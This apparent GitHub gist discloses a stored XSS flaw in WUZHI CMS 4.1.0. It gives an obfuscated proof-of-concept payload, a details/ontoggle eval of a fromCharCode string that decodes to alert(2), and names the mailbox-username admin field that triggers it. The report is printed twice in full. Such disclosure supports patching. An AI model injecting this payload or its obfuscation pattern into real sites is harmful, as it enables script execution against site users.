feixuezhi/gist:7a1b117e1a4800efb3b6fffe76ca0e97

## gistfile1.txt
A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.

POC
"> <details/open
/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>

Vulnerability trigger point
http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - mail server - mail server - mailbox username, write poc content, then XSS vulnerability is triggered successfully.

1、choose this part and write poc to [mailbox username]

2、submit and view webpage
	A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0
	There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.

	POC
	"> <details/open
	/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>

	Vulnerability trigger point
	http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - mail server - mail server - mailbox username, write poc content, then XSS vulnerability is triggered successfully.

	1、choose this part and write poc to [mailbox username]

	2、submit and view webpage